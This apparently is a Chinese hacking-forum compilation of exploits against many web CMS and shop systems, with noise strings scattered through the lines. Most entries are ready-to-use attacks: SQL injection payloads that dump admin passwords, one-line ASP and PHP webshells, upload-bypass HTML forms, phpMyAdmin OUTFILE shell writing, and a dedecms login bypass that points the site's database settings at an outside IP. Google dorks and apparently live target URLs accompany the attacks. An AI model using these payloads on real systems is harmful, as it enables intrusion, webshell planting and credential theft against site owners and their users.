启航企业建站系统 cookie注入漏洞通杀所有版本3 f- M. x) [, H! T0 y: d( _
$ d3 m/ r) S. q3 z4 I% v! }直接上exploit:) I% z, {% G( m5 u7 j _
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));0 ]/ y4 V& D( ?
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
' I& g0 B7 j. X2 b X6 p4 l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 `- _. l' x8 K7 c- g& W- H9 c
Asprain论坛 注册用户 上传图片就可拿到webshell
/ e$ T2 |5 z2 M* P* ` k* l" I/ ^+ P# ^% X
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。8 Y# }) a' O/ O) t# f+ ~, q$ Q
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
' i% w5 ]6 b0 a8 P. a" d+ {2.gif 为一小图片文件,一定要小,比如qq表情图片" e! _1 s& e: i9 W" e* p
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用8 O1 r* E6 H4 k/ V
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
( l) t$ V0 m0 M+ L; }# h5.q.asp;.gif
. O3 Q' }! B0 |4 h- dgoogle:Powered by Asprain
% Z& y2 z- c/ K' t7 c--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 G4 P' g# J) S# H7 l# w2 ]7 D! L
4 @% K1 ?0 S7 z& i, x0 NShopNum1全部系统存在上传漏洞。2 L# W& H/ p" Z, R' f
) D% G$ w9 D) J首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。: F! _: W+ H5 j9 J o3 v8 n
按说明 提示登录后台。。' K0 E$ r$ H( |: ^
在后台功能页面->附件管理->附件列表
9 D2 O; z& m; u9 A3 f% s% z2 Z可以直接上传.aspx 后缀木马* v" g9 c) g' l3 i! e$ }( X! M& l
http://demo.shopnum1.com/upload/20110720083822500.aspx
o5 s8 J8 `( b1 J' N2 f3 x0 m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% w+ D F5 V; b& k2 Q, B
# D& |. `1 s* k
牛牛CMS中小企业网站管理系统 上传漏洞& y) g6 h0 D. n2 i
% U* I% L- n5 @: W3 ~4 v: T; _牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
' R# b2 @* j' }7 }* V7 n* K后台:admin/login.asp
8 v L W* F3 Y# w& y" tewebeditor 5.5 Nday
( S6 c/ [8 h f7 d: P6 R+ hexp:
2 R' ~+ X$ g/ ]9 B<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
( i3 [' X1 i3 H# Z& p<input?type=file?name=uploadfile?size=100><br><br>?
" ~6 [! f5 {# T- ^' s! B<input?type=submit?value=upload>?
) w3 H; t: `$ ^- q% c0 M8 t</form>
8 p d! Z+ n( q7 D. Eps:先上传小马.
3 m' T) x9 E! j9 qinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏. e( P! ~9 E& }" w: s6 w {
1 `8 {' K! L6 k" s: \% X--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% v& s3 y: x5 f" e0 l0 x" C& J- J/ f8 W* I2 P1 Q% C* S- a! ]* b3 C4 K
YothCMS 遍历目录漏洞
& d. i. C q' W: v4 F) R; `
; q- Z0 \% D$ N( m0 S% W% G优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
% g& P) F/ A9 ~0 V+ ^默认后台:admin/login.asp
4 @" L Q- }7 W2 J9 e' ~1 H4 E遍历目录:
% k; k" @( v, e1 bewebeditor/manage/upload.asp?id=1&dir=../
" Z) C; L* G" v& P! e+ g8 h; c sdata:4 h* f$ L' l; b, g
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa) U6 w- r% A& }0 S; D& a/ ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 Z# u! t1 x5 i, E+ L( R, {0 t
/ ~9 E; t1 ]# u
Net112企业建站系统 1.06 W$ w" M( M# b
2 p& O" C1 Y h
源码简介:
9 s; C6 L* w6 J6 |: pNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
" N7 V, y! J) Q添加管理员:+ `! q7 u5 v6 D) b
http://www.0855.tv/admin/admin.asp?action=add&level=2
7 l$ K4 d5 Q+ K- O: s9 [其实加不加都不是很重要,后台文件都没怎么作验证。
% u) ~! S( G9 L- `! s' Q上传路径:
" G7 }, q; S8 S' g/ Q, \http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200" d# ?# S2 o8 S' \: d
http://www.0855.tv/inc/Upfile.asp?Stype=2! G; A) H6 d: k
怎么利用自己研究。2 M. `5 }+ T) V
遍历目录:
2 E" g+ F m0 b) @7 ~ qhttp://www.0855.tv/admin/upfile.asp?path=../..5 u! G) C# g7 v, C- [
如:
( W) W' @( B4 g7 M' {http://www.0855.tv/admin/upfile.asp?path=../admin! R" Y6 {! F4 D# {; T! R
http://www.0855.tv/admin/upfile.asp?path=../data
: `- _+ \1 ^/ k& v9 q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 p) ~) a+ @; W6 \
- y( [4 g0 s8 F易和阳光购物商城通杀 上传漏洞: K% W- e. V* O) |
/ @* } I/ j7 I' d$ W5 V' o
前提要求是IIS6.0+asp坏境。
9 R" {1 s3 o3 a2 W漏洞文件Iheeo_upfile.asp
8 d7 ~, m) r% u7 N( N7 A过滤不严.直接可以iis6.0上传
2 N0 Y$ c- R# O1 K. H把ASP木马改成0855.asp;1.gif [# D; H$ e; R; ^
直接放到明小子上传
! _- D( f* y# t# ]4 y9 a' hGoogle搜索:inurl:product.asp?Iheeoid=
) e$ I6 o- \0 @6 y) a--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: n6 m \4 q9 q0 ?. _6 B% ?3 Y# L
# j; y$ ?4 n7 ~ d1 Sphpmyadmin后台4种拿shell方法 N! I" `: k2 K2 S k8 F+ Z' Q
' X4 t9 s2 ]& }1 y. _% J! S& _
方法一:
2 R. Y+ y# w( Y) I) oCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
! t% f' e4 c+ GINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
& ^- ^1 P: m8 ^: @* oSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
- Y O6 q/ r# }9 j! f----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
( z1 ], F( d* h6 f% P0 g% u一句话连接密码:xiaoma
# y( h% A1 a, }* f方法二:
. W& R; h4 Q- o lCreate TABLE xiaoma (xiaoma1 text NOT NULL);7 I; y+ l6 d/ ~4 N) [6 g; m
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');1 [1 |0 }5 w( r8 y
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';( y8 C3 u9 {, d, {0 h6 b
Drop TABLE IF EXISTS xiaoma;
% d7 g6 X0 X. y- Q方法三:
8 S, |+ p g& m. ?读取文件内容: select load_file('E:/xamp/www/s.php');
S/ Y6 a; V/ c6 y2 {写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'0 \) P( B7 h9 I: Z B& q ^
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 Y. U3 C ^: s: W; w5 j方法四:
# I5 c5 S) [# s' i( [5 D) ?# dselect load_file('E:/xamp/www/xiaoma.php');
( |' c' g1 ~- ~2 Dselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( i8 {" p# F" I' R& e4 w, N# O然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir5 o0 X2 }/ H; R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% N( H7 S! s2 S$ n# c5 C+ [
$ l' B% S" v o传信网络独立开发网站源码0day漏洞
! [& m6 @# K% x
( J& b5 N- H' v* K1 u( H$ c4 T1 l3 _后台system/login.asp
; L) C# O& ]8 c* r进了后台有个ewebeditor7 I7 b+ R: A% K: m/ @/ K
Google 搜索inurl:product1.asp?tyc=. z S4 _4 D" y6 h2 F& z
编辑器漏洞默认后台ubbcode/admin_login.asp
/ o" U1 ^( X0 f Z6 M* I数据库ubbcode/db/ewebeditor.mdb
1 ~: G1 j+ S, E5 k Q默认账号密码yzm 1111119 @- @% t& J4 [* ]+ r
" S! ?2 ^3 M* F) J6 Z2 H# }
拿webshell方法
9 _1 z8 y' H P- K9 s# n登陆后台点击“样式管理”-选择新增样式 " k) j3 v' s) A. ~! d
样式名称:scriptkiddies 随便写
. E* |5 f3 B2 ]路径模式:选择绝对路径
8 Z Q/ n. A, R+ _, U图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx- O7 Q( Y- W2 d a
图片类型比如就是我们要上传的ASP木马格式
+ r" y. T7 j( w+ Z( ]: ^1 J上传路径:/
0 o2 [, }$ h' t, o* x4 M/ J图片限制:写上1000 免的上不了我们的asp木马
3 u6 }5 i2 O g" }* `上传内容不要写* s' ?! h3 ?/ l5 k9 F3 `
可以提交了 : {' b1 _9 d8 q0 K# A
样式增加成功! 3 Z9 a0 a- t# B+ i8 R M+ n7 ~- i
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
2 W0 h& u( }3 O3 G/ w6 Y0 w1 U按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
- `( h0 [. L4 w网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
' g; e3 k+ h" a8 @- v, f9 W& G上ASP木马 回车 等到路径
& R! ^8 B' b/ }' E( J2 [- ~
- j4 G) G- G& h# ]2 C后台:system/login.asp
3 u; C% h( J ]5 t i& F" ~) U) nExp:
1 a# K: w: Y y Oand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master8 H; T0 o( ^, p: @
测试:
0 t* {1 g+ I0 Thttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 @& q& C& ^$ G- X3 r0 `http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
4 m/ p2 {6 h7 X. m7 I' y! ]3 Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ H9 i. i* |+ E
% j O) h9 ?! l: V( Q5 Dfoosun 0day 最新注入漏洞* x) j. m, @9 w/ h' n
$ H! I$ C1 n6 V. M& j漏洞文件:www.xxx.com/user/SetNextOptions.asp0 F1 B& ~: ]6 t; Q! U7 V1 b s
利用简单的方法:
" W i2 q& s3 g' O3 w' }暴管理员帐号:% p) T7 s, @) ]! ~+ F1 J& e
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin8 ^' s$ S- ?" A4 v5 B
暴管理员密码:0 j! D) @* ~% l; m
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,' O; c! P9 U5 L; @1 f" j: a2 V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 h1 O' f9 P! h, M( V
( ~: _! z5 @% |# X- Y u( Z% c4 b
网站程序的版权未知!0 _6 c9 R8 j- N- c) u4 Z* z: a
3 ]- ~8 h' m9 J* _* ~默认网站数据库:
% _4 `: m: J+ m7 E, g' H4 }www.i0day.com/data/nxnews.mdb% w$ Z5 U& u4 U! r% Z
ewebeditor 在线编辑器:( l+ B( a# _+ e: y: g% _+ \6 k
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
0 z* y8 Y2 w3 T9 M. ~4 ]登录地址:ewebeditor/admin_login.asp; ]. z( J( Y9 @: u, R
默认密码:admin admin
, x. T% R1 w- w3 Y0 ?3 }" s- s登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
' @* `7 V; U( [
6 M& w! V& n) ]Sql注入漏洞:
7 \. | h4 }# ~1 l5 R! J1 Nhttp://www.i0day.com/detail.asp?id=12
" u2 ^* ^7 [, k! y; J9 n! \- M6 zexp:
# B9 U5 Z; t( H$ Gunion select 1,admin,password,4,5,6,7,8 from admin
6 l: m- T- m7 j, _0 V爆出明文帐号/密码6 t" c6 S4 `! v- \
1 H4 v' Z0 {' _# |2 z7 N6 [
上传漏洞:
7 D: @$ x4 ^# y7 j$ o后台+upfile.asp2 n8 w( F- O: h! q
如:! w9 @- o# v, {( l) ^
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
, s/ O8 U5 M9 Y- ]) {shell的地址:网址+后台+成功上传的马
5 |6 |5 j, g" `, `2 g) D8 `google:inurl:news.asp?lanmuName=" B2 H- I5 I/ j3 P7 v# E( f
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
d, y7 w# z7 x$ Y1 a# N4 H( X4 o/ K3 V) f
dedecms最新0day利用不进后台直接拿WEBSHELL
1 o& D/ u- W$ J2 i# ]" l# t v E1 T
拿webshell的方法如下:/ q8 x! A2 k: A2 t
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
! s, k! ~9 o" k6 W- X; L: ?+ G5 m2 F前题条件,必须准备好自己的dede数据库,然后插入数据:' p, J6 w) _ Q5 |) R9 V6 ~
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
. N1 w" }0 D% n A6 m, H
9 H3 l& ?" q/ t* w+ v再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
# L4 K4 ~& `/ m A<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
* X% m/ w0 Y. J0 d' v& @: z, m/ r1 W<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />+ _* @9 `1 r/ s( X ?
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
, e; y. u8 a4 M; J5 A/ y<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
& F9 _9 ?* v+ y9 C+ ]* e1 C+ `<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
4 ^8 p, `8 {4 U! Q; [<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />8 V3 _7 |$ x8 E* `" `) v
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
7 O' g8 `- |- h* @<input type="text" value="true" name="nocache" style="width:400">
! f2 }) s! K) t& {8 m; u9 u<input type="submit" value="提交" name="QuickSearchBtn"><br />
) _5 I% v. K* m</form>' V. t3 F: c/ g3 U$ Z: l H
<script>! v1 n0 a& a0 _3 g8 @" L
function addaction()
8 z& @1 v$ V' F0 z# e* g7 F( d{
6 r8 I$ z0 \! _0 b5 s2 sdocument.QuickSearch.action=document.QuickSearch.doaction.value;% c! A% D1 G% v: r
}' F) E2 C% f/ q( n' R! k; i5 |
</script>
" E4 @- ^0 W8 \6 K9 J+ N-----------------------------------------------------------------------------------------------------------------------------------------------; I0 n* G7 L; S$ z/ o+ R
: N/ i# R0 [! z: X2 f9 f2 {dedecms织梦暴最新严重0day漏洞
% W. y% i1 d0 P$ J P( a5 V: rbug被利用步骤如下:
6 `: ]: G0 D8 f3 P3 Q9 U% Ghttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
; ^% T: |8 G% E把上面{}上的字母改为当前的验证码,即可直接进入网站后台。1 M7 ?( @/ n+ g6 {5 o
-------------------------------------------------------------------------------------------------------------------------------------------
2 O7 J S+ a& X( v
( G2 q9 M5 @5 ~0 ~5 {多多淘宝客程序上传漏洞 8 h) [! R) L" u' t9 s9 g+ D
漏洞页面:
! P4 c/ Z, J. S3 wadmin\upload_pic.php! Y! S3 Y) k* N, p' @ ?; T
传送门:
E2 f$ K1 P0 Y/ {http://www.www.com/admin/upload_pic.php?uploadtext=slide1
% T9 r" ^# x2 c% `" y' j; HPS:copy张图片马 直接 xxx.php 上传抓包地址!
! i. N. V3 _& A$ j" L7 _$ c------------------------------------------------------------------------------------------------------------------------------------------------------
+ l; p2 i/ j4 h/ ^9 }
; y, U3 Q- J: ]+ E无忧公司系统ASP专业版后台上传漏洞
- u& S' O0 \4 i, S# j" D漏洞文件 后台上传
b! y- d& M% G" U5 p' F/ b: {6 Wadmin/uploadPic.asp/ L% L. ? ?4 F" v$ ^
漏洞利用 这个漏洞好像是雷池的0 m' p! \( P) V8 w( \
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=13 Z& T5 ~: I3 L- T' I
等到的webshell路径:% Q5 P9 F/ F+ E& O0 Y5 j' l4 B0 j
/UploadFiles/scriptkiddies.asp;_2.gif& u- ^; y" s% d# z& X
---------------------------------------------------------------------------------------------------------------------------------------------------
$ S1 r+ N9 A4 Y) a. {" I
8 C% ^2 w/ n* j$ S+ o住哪酒店分销联盟系统2010
% m7 |2 `, S2 I7 V8 q. d* oSearch:
# s4 e" l2 }6 B! ]/ Sinurl:index.php?m=hotelinfo, s, z" [; w5 [& `0 {4 |
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
w# ~/ F3 [& ?) ?. B默认后台:index.php?m=admin/login/ J4 Y6 E. x& o. D! l; z) D
--------------------------------------------------------------------------------------------------------------------------------------------------
9 A" t7 b/ W. g( j
: u0 u7 y6 Z' V# U- x0 einurl:info_Print.asp?ArticleID=
$ w t) _9 h0 |; k后台 ad_login.asp
8 v* I, ^2 Y6 _. T爆管理员密码:
; P' U$ C7 P0 u4 _union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
* O) G4 }- `0 u7 z5 S$ G1 Y------------------------------------------------------------------------------------------------------------------------------------------------------------$ j* ~0 C$ `' I7 [+ s) P8 o
; [( E7 o" n, M G) ~搜索框漏洞!9 S- G0 B3 n+ ?( G5 E
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='0 U* q( A3 t. f O0 x- p
--------------------------------------------------------------------------------------------------------------------------------------------------------
# g9 U7 h% l$ ^" g; B. Y% u6 j: w. Y/ ^+ x- |& N
关键字:
" S( t* T! w7 u4 X- h' Kinurl:/reg_TemletSel.asp?step=2
! ]/ D/ ^7 J5 P# O7 _0 u或者+ j! _/ j( S: c7 e, m) S
电子商务自助建站--您理想的助手! t% U0 _* V( [, D. z8 M" r" D- Z. P
------------------------------------------------------------------------------------------------------------------------------------------------- x( ^) Z& ?: f( U* ~0 w' z
; D# T2 j7 \. l1 m1 b2 Y
iGiveTest 2.1.0注入漏洞
9 w' \0 J0 S4 C0 e3 q5 S+ A/ fVersion: <= 2.1.08 X" D- J- p% X7 ^ A
# Homepage: http://iGiveTest.com/
$ s7 o, P4 Q( A$ N谷歌关键字: “Powered by iGiveTest”
1 v& f' a- y" C$ t6 A随便注册一个帐号。然后暴管理员帐号和密码
( p" t; |1 @( Y8 l8 ?* Ghttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
* O" m6 @) Z8 q" Q------------------------------------------------------------------------------------------------------------------------------------------------! _, _9 x' e- a; q$ ]3 k6 a7 Q
3 R$ H% L2 A: k- ~( ^1 jCKXP网上书店注入漏洞
8 O2 E Q) W2 e; b# v工具加表:shop_admin 加字段:admin# h& }. g2 `4 [1 V% c2 B) j
后台:admin/login.asp
, V t1 L* |0 H9 _& K登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/* y$ L( y: G3 \- N- B
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息0 t3 z9 y, i5 H8 |% w
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* a* F6 ~. x* S# F" |( [
$ t6 z9 [* h% B( `2 E4 o段富超个人网站系统留言本写马漏洞
; o$ P3 L4 t% V6 q源码下载:http://www.mycodes.net/24/2149.htm
* X' }3 `, ^! m9 b( Y; Raddgbook.asp 提交一句话。- K! x7 W- `# B6 w; ~9 \( S0 R
连接: http://www.xxxx.tv/date/date3f.asp
" q: ^- j4 _; A( p9 Dgoogle:为防批量,特略!( T0 g% r; a6 n1 Y; |
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------" [* b" ~3 L K
3 L4 r5 h5 m }' T9 A' L' z
智有道专业旅游系统v1.0 注入及列目录漏洞
2 M i" @( J0 ?& z' p# Y9 W默认后台路径:/admin/login.asp3 h6 a- e" q, |! E+ J& J) d+ J
默认管理员:admin
2 d3 F# A* C1 }5 s默认密码:1234569 Z8 e1 r9 o9 [" ?
SQL EXP Tset:- ?+ Z4 M9 S; W, N6 w
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin+ r0 w0 i* ~7 W. c% ~
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 J8 n r% h; L x3 H4 Y/ S* o5 f/ V$ B
ewebeditor(PHP) Ver 3.8 本任意文件上传0day, x( k# u" N: P$ D# J
EXP:
- B0 K# y5 X$ `<title>eWebeditoR3.8 for php任意文件上EXP</title># Z& p1 ~$ r) F4 T, O
<form action="" method=post enctype="multip& n$ j" d) E- Q
art/form-data"> D( w% @8 m- m! _, P" f& z0 l9 J
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
! X' _1 I+ `4 \' o9 j: OURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
1 \# K9 n- u) L8 }3 g<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
0 K- d: M9 \6 b* O1 ~- efile:<input type=file name="uploadfile"><br>
! ?0 L" j0 e" ^6 u8 @, |! @7 b; \<input type=button value=submit onclick=fsubmit()>
1 \# h0 a! R1 z$ f) t: t</form><br>
3 ?: y% U' a7 d# r; @! s9 Q% L<script> / f) E/ s5 p, ~
function fsubmit(){ ( x# w5 q" }" D( {5 M$ T2 T
form = document.forms[0]; ) j( f2 C6 J& p2 ^4 p; `/ W h
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
8 Y0 d1 ^, N# g$ |, a% z; Z9 s% Ualert(form.action);
- q {) \; z6 C" s4 v2 w: C$ cform.submit(); 0 P7 {, V" b, c. i7 r9 ]8 @
}
% }# @9 O* \9 K6 n% b</script>" H0 B# \3 ?+ @
注意修改里面ewebeditor的名称还有路径。$ D1 ]9 t8 E0 S! p
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
P' x2 O3 W( ~9 ^# e8 p, W* M, V/ N0 s; K& @ Z
提交’时提示ip被记录 防注入系统的利用9 }4 O4 C( q! z
网址:http://www.xxx.com/newslist.asp?id=122′
5 Z( b7 F# z8 W. x2 ?% \8 u+ {提示“你的操作已被记录!”等信息。. }+ B9 t! K& V) }9 x
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
$ J. L. F( N* C-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 ^, W- X3 |& Z
2 Z, x) J! @2 m" \9 F5 ^% ], N
西部商务网站管理系统 批量拿shell-0day h. Z; N: U P0 Y# l K
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
2 L: S+ a5 h+ q; R* j+ E1 |" b" t. F1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
m: j5 S( w% s9 J, w$ ^ m2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
8 G x$ U1 ? ?' q+ N3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂# x' @9 Y) g$ f
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ X: u- j1 {8 u1 d' G. U
+ r- j) |4 f NJspRun!6.0 论坛管理后台注入漏洞
8 l; j# s* h" t+ r* k
; F2 {6 V, K9 S; u8 {SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
! n: m7 i: n" K2 @; W. E- uJspRun!6.0
) N5 x7 j9 p5 m1 q+ @* @; T# w0 s" Y. N& P漏洞描述:
' G. T$ d- A+ H8 n. bJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。7 U7 {. ?, p/ u5 v: r2 d1 I
在处理后台提交的文件中ForumManageAction.java第1940行6 o( R4 |; U4 x; }2 j' O0 V& w
String export = request.getParameter("export");//直接获取,没有安全过滤) E. r* t: C* w5 ^2 [
if(export!=null){
U5 N K8 Q# ]List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...* o [- C# j! q& m% ? f
if(styles==null||styles.size()==0){
- ]! B7 ?1 B) e. @2 h<*参考9 t) N2 Q( G) S5 v( m+ ]
nuanfan@gmail.com
) ]0 i; |: a( `: M- P. [- k* j*> SEBUG安全建议:+ O0 G3 @; U' `4 [
www.jsprun.net% T9 U2 i% Q9 ?; `" `
(1)安全过滤变量export7 F7 f C& o0 ^5 ]7 Z
(2)在查询语句中使用占位符7 V0 Q! N8 B3 v1 U& ^; f' p9 H
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( O9 b. z, G" u- O; @3 D
& }1 I4 L' e- q6 e6 b- N乌邦图企业网站系统 cookies 注入
0 [4 L n, \7 D; k3 _# p7 W
$ b" p% t% b8 _7 Z% Q- Y# d程序完整登陆后台:/admin/login.asp+ j9 I/ @" T5 f& E; m
默认登陆帐号:admin 密码:admin888
8 @5 c9 W) ? E语句:(前面加个空格)- Z' Q- l1 }0 a7 l' p% x# `
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin$ H& Q2 f! M4 t5 k I
或者是16个字段:
& P0 Q( c* e2 j! e& ^ O( Rand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
* l4 n1 }. i; V3 r" ^1 T爆不出来自己猜字段。
; m/ {+ u" j e# T1 l' ~8 {. o! j注入点:http://www.untnt.com/shownews.asp?=884 T9 {$ F' R# p+ G6 X' _
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
- M9 l1 ^( D. \$ C# y5 Y8 D关键字:
+ p8 G1 ]7 U7 q- \" A( q! Iinurl:shownews?asp.id=
1 X$ P; J: N$ z2 l. `6 V, b1 x) f+ b-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. @7 R- ~) `+ B$ h# O' [; O; o9 T/ s& ?9 S4 U! x( N1 B2 a
CKXP网上书店注入漏洞
9 ` f" I: ?7 `! A' H# ~2 W+ l. K! I! Q- P T9 ] G& Z
工具加表:shop_admin 加字段:admin
( e0 X: r# _7 k$ R% o" Y% l( Y. L! \后台:admin/login.asp " l- e3 u2 Q. y8 I2 l+ i3 J4 K
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
0 X7 y- m6 e& uinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
9 c6 C* g7 n2 f---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 \ v. S9 z% Q5 j: D
' C- e7 n9 p3 K% n% _YxShop易想购物商城4.7.1版本任意文件上传漏洞
; ~ D) V B; `7 f5 F' N& W- J# ?3 h7 C) Z
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
0 O9 e8 e9 q. u& c- g* B- i- P跳转到网站根目录上传任意文件。) C& [9 o" j2 P& G$ Y
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件. S2 I0 l" Y; @' b9 A2 s1 T8 S
